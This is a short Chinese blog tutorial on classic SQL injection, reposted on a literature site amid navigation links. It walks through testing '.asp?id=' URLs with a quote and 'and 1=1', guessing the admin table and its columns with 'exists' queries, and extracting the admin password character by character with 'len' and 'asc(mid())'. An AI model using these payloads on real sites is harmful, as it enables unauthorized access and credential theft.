手机版
网站地图
美文美图
最新动态
你好,欢迎访问
好美文阅读网
个性皮肤
搜索
网站首页
美文
文章
散文
日记
诗歌
小说
故事
句子
作文
签名
祝福语
情书
范文
读后感
文学百科
美文摘抄
节日文章
名家散文
网名大全
座右铭
口号大全
面试技巧
说说大全
阅读答案
诗词默写
流言蜚语
节日祝福
好句子
经典台词
谚语大全
亲情故事
友情故事
表白情书
工作报告
活动总结
心得体会
专题汇总
美文网首页
SQL注入
SQL注入
作者:
糖no1
| 来源:发表于
2018-11-13 19:37 被阅读0次
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
一般来说,进入网址后,随便进入一个链接,这使得网址链接都是以【.asp?id=32(数字任意)】结尾的
首先在末尾加单引号【’】
显示数据库输入错误,说明单引号被过滤掉,bu可以用
接着在末尾加【and 1=1】 [and 1=2]
找到有注入漏洞的目标网站
返回页面显示该网站存在注入漏洞
在链接末尾添加语句【and exists(select * from admin)】,页面正常显示,说明存在表名【admin】。
在连接末尾添加语句【and exists(select admin from admin)】,页面显示正常,即在表中存在admin列。
在链接末尾添加【and exists(select password from admin)】,页面显示正常,说明存在列password
在连接末尾输入语句【and (select top 1 len (admin) from admin)>1】,页面显示正常,数字依次加1,进行测试,如【and (select top 1 len (admin) from admin)>5】,说明字段长度为5。
同样的方法,在链接末尾添加连接【and (select top 1 asc(mid(admin,1,1)) from admin)>97】,可猜解出第一条记录的第一位字符的ASCII码为97,对应a
同样的方法可以得到admin字段内容为【admin】,password字段内容为【bfpms】。
其实就是慢慢猜解,第一猜注入漏洞,第二财列表名,第三猜字段内容(对照ASCII码查出账户和密码)
相关文章
网友评论
本文标题:
SQL注入
本文链接:
https://www.haomeiwen.com/subject/slzlfqtx.html
延伸阅读
那年盛夏诗歌
环境监察队工作总结范文
优秀教师学习心得范文
华胥引的读后感300字
《Its red》教学反思范文
农资购销的合同范本
竞选中队委优秀演讲稿
辞金蹈海的成语解释
《世纪宝鼎》公开课教案设计
因为爱你,所以牵挂
今生今世红尘醉——美到
一个90后的内心独白
致已逝去的高中年华
深度阅读
您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!
情人节
母亲节
重阳节
清明节
端午节
植树节
元宵节
妇女节
愚人节
圣诞节
父亲节
教师节
儿童节
劳动节
青年节
建军节
万圣节
平安夜
光棍节
中秋节
国庆节
感恩节
腊八节
更多话题
栏目导航
摄影
故事
互联网
读书
旅行
热点阅读
新时代的志愿者
旺福(9)淘金后遗症
1.2米小阳台改小书房,生活和文字更有温度
周期小王子证券公司指数
LeetCode 707 ——设计链表
室友相处雷区,你踩了多少
2018-11-13
放弃是真的简单!
保健品行业报告
关于丧
网友评论